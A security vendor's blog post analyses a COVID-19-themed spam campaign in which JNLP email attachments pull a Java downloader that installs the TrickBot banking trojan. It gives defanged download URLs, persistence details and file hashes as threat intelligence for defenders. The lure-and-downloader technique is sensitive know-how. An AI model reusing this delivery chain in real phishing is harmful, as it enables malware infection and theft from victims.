Trustwave SpiderLabs Uncovers Critical Cybersecurity Vulnerabilities Exposing Manufacturers to Costly Attacks. Learn More

Trustwave SpiderLabs Uncovers Critical Cybersecurity Vulnerabilities Exposing Manufacturers to Costly Attacks. Learn More

Managed Detection & Response

Eradicate cyberthreats with world-class intel and expertise

Managed Security Services

Expand your team’s capabilities and strengthen your security posture

Consulting & Professional Services

Tap into our global team of tenured cybersecurity specialists

Penetration Testing

Subscription- or project-based testing, delivered by global experts

Database Security

Get ahead of database risk, protect data and exceed compliance requirements

Email Security & Management

Catch email threats others miss with layered security & maximum control

Co-Managed SOC (SIEM)

Eliminate alert fatigue, focus your SecOps team, stop threats fast, and reduce cyber risk

Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
The Trustwave Approach
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Platform
SpiderLabs Fusion Center
Security Operations Centers
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats
SpiderLabs Blog

TrickBot Disguised as COVID-19 Map

Cybercriminals are continuously exploiting the Coronavirus (COVID-19) pandemic. In our quest to monitor the COVID-19 related spams, we recently spotted one interesting campaign which uses an unusual email attachment to deliver TrickBot malware.

Figure 1: The spam campaign flow


The Road to TrickBot

The email, claiming to be from a volunteer organization which helps with those seeking COVID-19 financial aid, entices the email recipient to open the attachments – fake COVID-19 forms.


Figure 2: Trustwave Security Email Gateway displaying a recent COVID-19 spam


The attachments are Java Network Launch Protocol (JNLP) files. JNLP files are XML formatted files which can be used to launch java programs hosted on a remote server to the client machine. If the client machine has Java Runtime Environment (JRE) installed, JNLP files can be executed via a double click, as JRE includes the technology Java Web Start which can run such files.

In Figure 2, the two JNLP attachments are identical. Once executed, they will download and run the java program “map.jar” hosted at “http[s]://mapcovid[.]net” – a second stage downloader disguised as COVID-19 "Map" java program.


Figure 3: The attachment SARS-2_Form.jnlp, a fake COVID-19 form, is a downloader
Figure 4: The second stage downloader “map.jar” will download and execute the main malware “map.exe”


The downloaded file “map.jar” will launch the World Health Organization’s (WHO) “Q&A on coronaviruses (COVID-19)” webpage to cover up its malicious behavior – the downloading and installation of the main malware. This malware, concealed as a COVID-19 “Map” executable, will be downloaded from “http[s]://basecovid[.]com/map[.]exe” then saved and executed as %appdata%/map.exe.

The second downloaded file “map.exe” is the modularized banking trojan called TrickBot. This malware is prominent nowadays due to its wide range of functionalities: stealing information, downloading of other malwares, spam emails, etc.

The TrickBot %appdata%/map.exe will be automatically executed via the Execute() function of “map.jar”. Once run, it will create its installation folder SpotifyMusic at the Startup folder then drop a copy of itself. It will also create an encrypted file “settings.ini” – that contains the configuration of the TrickBot.


Figure 5: Installation path of the downloaded TrickBot
Figure 6: Decrypted TrickBot configuration


The decrypted TrickBot configuration contains vital information which will be used during the communication of the TrickBot executable to the C&Cs. It includes the version of the currently installed “map.exe” and its group tag <gtag>, the list of IP addresses of the C&Cs, and the first module to be downloaded by “map.exe”.

Figure 7: The memory dump of TrickBot “map.exe” showing the first request to its C&C



Malware authors are continuously taking advantage the COVID-19 pandemic in their spams. Like other cybercriminals, the threat actors behind this TrickBot malware are unleashing their creativity on crafting the initial arrival vector of their malware. Often, we observe TrickBot being delivered as payloads of malicious document attachments, particularly macro downloaders. This is the first time we have witnessed TrickBot use JNLP files as downloaders. In fact, the use of JNLP files as email attachments, to deliver malware, is not common.

It’s likely we shall see more of this kind of threat. We would recommend blocking *.jnlp files at your email gateway. We have added protections for this threat to the Trustwave Secure Email Gateway for our customers.



SARS-2_Form.jnlp    SHA1: 46576bfebaecaacc4600bba429016b0713238f52
map.jar    SHA1: 0068154fbc4374642ebe50ac4f822c64b45635c8
map.exe    SHA1: 55b031294ff24919547cfcb4fd4f10a02902ce3b

Latest SpiderLabs Blogs

Trustwave SpiderLabs Report: LockBit 3.0 Ransomware Vs. the Manufacturing Sector

As the manufacturing sector continues its digital transformation, Operational Technology (OT), Industrial Control Systems (ICS), and Supervisory Control and Data Acquisition (SCADA) are becoming...

Read More

Overview of the Cyberwarfare used in Israel – Hamas War

On October 7, 2023, the Palestinian organization Hamas launched the biggest attack on Israel in years, resulting in numerous casualties and hostages taken. Israel responded with a large-scale ground...

Read More

The 2023 Retail Services Sector Threat Landscape: A Trustwave Threat Intelligence Briefing

The annual holiday shopping season is poised for a surge in spending, a fact well-known to retailers, consumers, and cybercriminals alike. The latter group, however, is poised to exploit any...

Read More